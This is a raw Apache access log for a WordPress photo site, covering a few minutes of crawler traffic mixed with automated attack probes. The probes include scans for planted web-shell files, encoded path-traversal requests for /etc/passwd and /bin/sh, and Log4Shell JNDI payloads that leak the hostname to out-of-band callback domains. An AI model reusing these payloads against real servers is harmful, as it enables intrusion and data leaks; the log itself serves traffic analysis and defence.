51.79.229.86 - - [18/Oct/2025:10:08:04 -0400] "GET /superalfa.php HTTP/1.1" 404 10904 "http://salhab360photos.com/superalfa.php" "Go-http-client/2.0"
20.171.207.254 - - [18/Oct/2025:10:08:05 -0400] "GET /products60940756?kg=0060197659 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.229.86 - - [18/Oct/2025:10:08:07 -0400] "GET /superslot.php HTTP/1.1" 404 10899 "http://salhab360photos.com/superslot.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:10:08:08 -0400] "GET /products208007222?kg=0205470630 HTTP/1.1" 404 9733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:10:06:48 -0400] "GET /lonte.php HTTP/1.1" 404 10905 "http://salhab360photos.com/lonte.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:06:51 -0400] "GET /psk.php HTTP/1.1" 404 10902 "http://salhab360photos.com/psk.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:06:53 -0400] "GET /olympus.php HTTP/1.1" 404 10903 "http://salhab360photos.com/olympus.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:06:56 -0400] "GET /slotgacor.php HTTP/1.1" 404 10900 "http://salhab360photos.com/slotgacor.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:07:05 -0400] "GET /kaskustoto.php HTTP/1.1" 404 10905 "http://salhab360photos.com/kaskustoto.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:07:12 -0400] "GET /jokerslot.php HTTP/1.1" 404 10903 "http://salhab360photos.com/jokerslot.php" "Go-http-client/2.0"
185.61.153.107 - - [18/Oct/2025:10:07:16 -0400] "POST /wp-cron.php?doing_wp_cron=1760796436.1984860897064208984375 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
51.79.229.86 - - [18/Oct/2025:10:07:17 -0400] "GET /adminslot.php HTTP/1.1" 404 10905 "http://salhab360photos.com/adminslot.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:07:30 -0400] "GET /adminjudi.php HTTP/1.1" 404 10904 "http://salhab360photos.com/adminjudi.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:10:07:30 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 21 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.6 Mobile/15E148 Safari/604.1"
51.79.229.86 - - [18/Oct/2025:10:07:33 -0400] "GET /slotterpercaya.php HTTP/1.1" 404 10897 "http://salhab360photos.com/slotterpercaya.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:07:37 -0400] "GET /slot2022.php HTTP/1.1" 404 10906 "http://salhab360photos.com/slot2022.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:07:42 -0400] "GET /slot5k.php HTTP/1.1" 404 10906 "http://salhab360photos.com/slot5k.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:10:07:44 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36"
51.79.229.86 - - [18/Oct/2025:10:07:43 -0400] "GET /loginslot.php HTTP/1.1" 404 10899 "http://salhab360photos.com/loginslot.php" "Go-http-client/2.0"
66.249.64.105 - - [18/Oct/2025:10:07:46 -0400] "GET /products17397808?kg=0017185721 HTTP/1.1" 200 29009 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; GoogleOther)"
51.79.229.86 - - [18/Oct/2025:10:07:46 -0400] "GET /adminpage.php HTTP/1.1" 404 10906 "http://salhab360photos.com/adminpage.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:07:50 -0400] "GET /alfamini.php HTTP/1.1" 404 10896 "http://salhab360photos.com/alfamini.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:10:07:50 -0400] "GET /products234259982?kg=0231403234 HTTP/1.1" 404 9743 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:10:07:56 -0400] "GET /products3433062?kg=0003391278 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:10:08:00 -0400] "GET /power.php HTTP/1.1" 404 10906 "http://salhab360photos.com/power.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:10:08:02 -0400] "GET /products22799604?kg=0022521643 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:10:08:05 -0400] "GET /products22795954?kg=0022518036 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:10:08:09 -0400] "GET /superadmin.php HTTP/1.1" 404 10903 "http://salhab360photos.com/superadmin.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:10:08:11 -0400] "GET /products234257928?kg=0231401205 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:10:08:14 -0400] "POST /wp-cron.php?doing_wp_cron=1760796494.3805549144744873046875 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
51.79.229.86 - - [18/Oct/2025:10:08:15 -0400] "GET /adminlogin.php HTTP/1.1" 404 10905 "http://salhab360photos.com/adminlogin.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:10:08:22 -0400] "GET /products54893178?kg=0054223832 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:10:08:25 -0400] "GET /products111850906?kg=0110486952 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
40.77.167.78 - - [18/Oct/2025:10:08:30 -0400] "GET / HTTP/1.1" 200 1164 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
66.249.64.106 - - [18/Oct/2025:10:08:32 -0400] "GET /ctg/search/similarImageSearchResultView/?ctgItemCd=139519 HTTP/1.1" 200 29061 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.159 - - [18/Oct/2025:10:08:31 -0400] "GET /products175164514?kg=0173028444 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:10:08:33 -0400] "GET /x12.php HTTP/1.1" 404 10903 "http://salhab360photos.com/x12.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:10:08:37 -0400] "GET /products40726698?kg=0040230112 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:10:08:37 -0400] "GET /clanx12.php HTTP/1.1" 404 10903 "http://salhab360photos.com/clanx12.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:10:08:40 -0400] "GET /products89599100?kg=0088506511 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:10:08:49 -0400] "GET /products128739594?kg=0127169680 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:10:08:55 -0400] "GET /ezz.php HTTP/1.1" 404 10897 "http://salhab360photos.com/ezz.php" "Go-http-client/2.0"
66.249.64.105 - - [18/Oct/2025:10:09:00 -0400] "GET /products113366430?kg=0111983994 HTTP/1.1" 200 28961 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:10:09:05 -0400] "POST /./RestAPI/LogonCustomization HTTP/1.1" 404 12302 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.10 Safari/605.1.1"
51.79.229.86 - - [18/Oct/2025:10:09:09 -0400] "GET /1000.php HTTP/1.1" 404 10896 "http://salhab360photos.com/1000.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:10:09:23 -0400] "GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1" 403 1242 "-" "-"
51.79.229.86 - - [18/Oct/2025:10:09:21 -0400] "GET /5000.php HTTP/1.1" 404 10905 "http://salhab360photos.com/5000.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:08:12 -0400] "GET /mistake.php HTTP/1.1" 404 10903 "http://salhab360photos.com/mistake.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:10:08:14 -0400] "GET /products198518114?kg=0196097244 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:10:08:17 -0400] "GET /products196951044?kg=0194549283 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:10:08:18 -0400] "GET /saldo.php HTTP/1.1" 404 10899 "http://salhab360photos.com/saldo.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:08:21 -0400] "GET /payment.php HTTP/1.1" 404 10899 "http://salhab360photos.com/payment.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:08:24 -0400] "GET /hck.php HTTP/1.1" 404 10899 "http://salhab360photos.com/hck.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:08:28 -0400] "GET /black_x12.php HTTP/1.1" 404 10896 "http://salhab360photos.com/black_x12.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:10:08:30 -0400] "POST /Side.php HTTP/1.1" 404 10853 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0"
51.79.229.86 - - [18/Oct/2025:10:08:40 -0400] "GET /baksokontol.php HTTP/1.1" 404 10903 "http://salhab360photos.com/baksokontol.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:10:08:43 -0400] "GET /products32031496?kg=0031640949 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:10:08:43 -0400] "GET /clanX12.php HTTP/1.1" 404 10897 "http://salhab360photos.com/clanX12.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:08:47 -0400] "GET /st12.php HTTP/1.1" 404 10903 "http://salhab360photos.com/st12.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:08:50 -0400] "GET /esteah.php HTTP/1.1" 404 10902 "http://salhab360photos.com/esteah.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:08:53 -0400] "GET /esteh.php HTTP/1.1" 404 10902 "http://salhab360photos.com/esteh.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:08:58 -0400] "GET /eassy.php HTTP/1.1" 404 10906 "http://salhab360photos.com/eassy.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:09:02 -0400] "GET /izi.php HTTP/1.1" 404 10906 "http://salhab360photos.com/izi.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:09:05 -0400] "GET /esteh12.php HTTP/1.1" 404 10906 "http://salhab360photos.com/esteh12.php" "Go-http-client/2.0"
20.171.207.254 - - [18/Oct/2025:10:09:09 -0400] "GET /products60939334?kg=0060196254 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
185.61.153.107 - - [18/Oct/2025:10:09:14 -0400] "POST /wp-cron.php?doing_wp_cron=1760796554.5687189102172851562500 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
51.79.229.86 - - [18/Oct/2025:10:09:12 -0400] "GET /2000.php HTTP/1.1" 404 10906 "http://salhab360photos.com/2000.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:10:09:12 -0400] "POST /./RestAPI/LogonCustomization HTTP/1.1" 404 12313 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/118.0"
51.79.229.86 - - [18/Oct/2025:10:09:15 -0400] "GET /3000.php HTTP/1.1" 404 10902 "http://salhab360photos.com/3000.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:09:18 -0400] "GET /4000.php HTTP/1.1" 404 10906 "http://salhab360photos.com/4000.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:10:09:19 -0400] "POST /./RestAPI/Connection HTTP/1.1" 404 12310 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.19"
157.20.32.210 - - [18/Oct/2025:10:09:26 -0400] "GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1" 403 1242 "-" "-"
66.249.64.105 - - [18/Oct/2025:10:09:24 -0400] "GET /wp-content/themes/acora/js/fwd/fwdgg/?NA HTTP/1.1" 200 699 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; GoogleOther)"
157.20.32.210 - - [18/Oct/2025:10:09:23 -0400] "GET /client/index.php HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0"
51.79.229.86 - - [18/Oct/2025:10:09:28 -0400] "GET /epic.php HTTP/1.1" 404 10898 "http://salhab360photos.com/epic.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:09:32 -0400] "GET /legends.php HTTP/1.1" 404 10898 "http://salhab360photos.com/legends.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:10:09:33 -0400] "GET /products234244644?kg=0231388083 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:10:09:34 -0400] "GET /warrior.php HTTP/1.1" 404 10906 "http://salhab360photos.com/warrior.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:10:09:39 -0400] "GET /products106812790?kg=0105510278 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:10:09:40 -0400] "GET /login.htm HTTP/1.1" 404 10924 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; ja-JP) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4"
51.79.229.86 - - [18/Oct/2025:10:09:41 -0400] "GET /grandmaster.php HTTP/1.1" 404 10905 "http://salhab360photos.com/grandmaster.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:09:46 -0400] "GET /mytic.php HTTP/1.1" 404 10897 "http://salhab360photos.com/mytic.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:10:09:47 -0400] "GET /products234265012?kg=0231408203 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:10:09:51 -0400] "GET /products80886240?kg=0079899905 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:10:09:55 -0400] "GET /romawi.php HTTP/1.1" 404 10903 "http://salhab360photos.com/romawi.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:10:09:55 -0400] "GET /products106810248?kg=0105507765 HTTP/1.1" 404 9744 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:10:10:08 -0400] "GET /space.php HTTP/1.1" 404 10899 "http://salhab360photos.com/space.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:10:11 -0400] "GET /kamunanya.php HTTP/1.1" 404 10898 "http://salhab360photos.com/kamunanya.php" "Go-http-client/2.0"
35.179.127.116 - - [18/Oct/2025:10:10:20 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0"
46.101.70.221 - - [18/Oct/2025:10:10:20 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0"
51.79.229.86 - - [18/Oct/2025:10:10:20 -0400] "GET /rce.php HTTP/1.1" 404 10899 "http://salhab360photos.com/rce.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:10:25 -0400] "GET /orisinil.php HTTP/1.1" 404 10899 "http://salhab360photos.com/orisinil.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:10:10:28 -0400] "GET /api/blade-user/user-list HTTP/1.1" 404 12366 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0"
157.20.32.210 - - [18/Oct/2025:10:10:28 -0400] "GET /api/blade-user/user-list HTTP/1.1" 404 12365 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36"
51.79.229.86 - - [18/Oct/2025:10:09:24 -0400] "GET /comeback.php HTTP/1.1" 404 10898 "http://salhab360photos.com/comeback.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:10:09:25 -0400] "GET /help/admin-guide/test.jsp HTTP/1.1" 404 12356 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:10:09:29 -0400] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 403 1242 "-" "-"
51.79.229.86 - - [18/Oct/2025:10:09:39 -0400] "GET /elite.php HTTP/1.1" 404 10899 "http://salhab360photos.com/elite.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:10:09:42 -0400] "GET /STATE_ID/123/agentLogUploader HTTP/1.1" 404 12366 "-" "Mozilla/5.0 (Windows NT 10.0; rv:139.0) Gecko/20100101 Firefox/139.0"
216.73.216.159 - - [18/Oct/2025:10:09:43 -0400] "GET /products1529054?kg=0001510490 HTTP/1.1" 404 9743 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:10:09:48 -0400] "GET /formLoginAuth.htm?authCode=1&userName=admin&goURL&action=login HTTP/1.1" 404 10902 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
51.79.229.86 - - [18/Oct/2025:10:09:50 -0400] "GET /mythicalglory.php HTTP/1.1" 404 10897 "http://salhab360photos.com/mythicalglory.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:09:58 -0400] "GET /yunani.php HTTP/1.1" 404 10906 "http://salhab360photos.com/yunani.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:10:10:00 -0400] "GET /products1555536?kg=0001536649 HTTP/1.1" 404 9733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:10:10:00 -0400] "GET /palestina.php HTTP/1.1" 404 10903 "http://salhab360photos.com/palestina.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:10:10:08 -0400] "GET /language/lang HTTP/1.1" 403 1242 "https://salhab360photos.com" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
51.79.229.86 - - [18/Oct/2025:10:10:05 -0400] "GET /islam.php HTTP/1.1" 404 10896 "http://salhab360photos.com/islam.php" "Go-http-client/2.0"
185.61.153.107 - - [18/Oct/2025:10:10:14 -0400] "POST /wp-cron.php?doing_wp_cron=1760796614.7699499130249023437500 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
20.171.207.254 - - [18/Oct/2025:10:10:13 -0400] "GET /products60913532?kg=0060170767 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.229.86 - - [18/Oct/2025:10:10:17 -0400] "GET /kw.php HTTP/1.1" 404 10896 "http://salhab360photos.com/kw.php" "Go-http-client/2.0"
164.90.241.135 - - [18/Oct/2025:10:10:20 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0"
174.138.112.39 - - [18/Oct/2025:10:10:21 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0"
157.20.32.210 - - [18/Oct/2025:10:10:28 -0400] "GET /api/blade-user/user-list HTTP/1.1" 404 12366 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
51.79.229.86 - - [18/Oct/2025:10:10:29 -0400] "GET /original.php HTTP/1.1" 404 10906 "http://salhab360photos.com/original.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:10:36 -0400] "GET /upah.php HTTP/1.1" 404 10902 "http://salhab360photos.com/upah.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:10:40 -0400] "GET /school.php HTTP/1.1" 404 10906 "http://salhab360photos.com/school.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:10:10:53 -0400] "GET /?x=${jndi:ldap://127.0.0.1 HTTP/1.1" 200 4189 "${jndi:ldap://127.0.0.1#.${hostName}.referer.d3pm34ikdbcl3g7iqchgoqz77cgjg9hmj.oast.pro}" "${jndi:ldap://127.0.0.1#.${hostName}.useragent.d3pm34ikdbcl3g7iqchgxkqjq8o9cfck8.oast.pro}"
51.79.229.86 - - [18/Oct/2025:10:10:48 -0400] "GET /teacher.php HTTP/1.1" 404 10899 "http://salhab360photos.com/teacher.php" "Go-http-client/2.0"
185.61.153.107 - - [18/Oct/2025:10:11:01 -0400] "POST /wp-cron.php?doing_wp_cron=1760796661.1668341159820556640625 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
51.79.229.86 - - [18/Oct/2025:10:10:56 -0400] "GET /student.php HTTP/1.1" 404 10906 "http://salhab360photos.com/student.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:11:02 -0400] "GET /juraganempang.php HTTP/1.1" 404 10905 "http://salhab360photos.com/juraganempang.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:10:11:04 -0400] "GET /products111847668?kg=0110483755 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:10:11:11 -0400] "GET /cirebon.php HTTP/1.1" 404 10896 "http://salhab360photos.com/cirebon.php" "Go-http-client/2.0"
20.171.207.254 - - [18/Oct/2025:10:11:15 -0400] "GET /products60873606?kg=0060131326 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.229.86 - - [18/Oct/2025:10:11:16 -0400] "GET /crb.php HTTP/1.1" 404 10902 "http://salhab360photos.com/crb.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:10:11:19 -0400] "POST /ddns_check.ccp HTTP/1.1" 404 10847 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.4.4 (KHTML, like Gecko) Version/9.0.3 Safari/537.86.4"
216.73.216.159 - - [18/Oct/2025:10:11:30 -0400] "GET /products32058224?kg=0031667353 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:10:11:34 -0400] "GET /ytta.php HTTP/1.1" 404 10899 "http://salhab360photos.com/ytta.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:11:40 -0400] "GET /yt.php HTTP/1.1" 404 10906 "http://salhab360photos.com/yt.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:11:44 -0400] "GET /anjrit.php HTTP/1.1" 404 10899 "http://salhab360photos.com/anjrit.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:12:04 -0400] "GET /jendral.php HTTP/1.1" 404 10905 "http://salhab360photos.com/jendral.php" "Go-http-client/2.0"
185.61.153.107 - - [18/Oct/2025:10:12:14 -0400] "POST /wp-cron.php?doing_wp_cron=1760796734.7821741104125976562500 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
51.79.229.86 - - [18/Oct/2025:10:12:12 -0400] "GET /bio.php HTTP/1.1" 404 10903 "http://salhab360photos.com/bio.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:10:12:29 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15"
20.171.207.254 - - [18/Oct/2025:10:12:21 -0400] "GET /products60938186?kg=0060195120 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.229.86 - - [18/Oct/2025:10:12:37 -0400] "GET /bio0.php HTTP/1.1" 404 10900 "http://salhab360photos.com/bio0.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:12:48 -0400] "GET /esacyber.php HTTP/1.1" 404 10903 "http://salhab360photos.com/esacyber.php" "Go-http-client/2.0"
185.61.153.107 - - [18/Oct/2025:10:11:15 -0400] "POST /wp-cron.php?doing_wp_cron=1760796674.9725000858306884765625 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:10:11:13 -0400] "GET /products56702868?kg=0056011451 HTTP/1.1" 404 9731 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
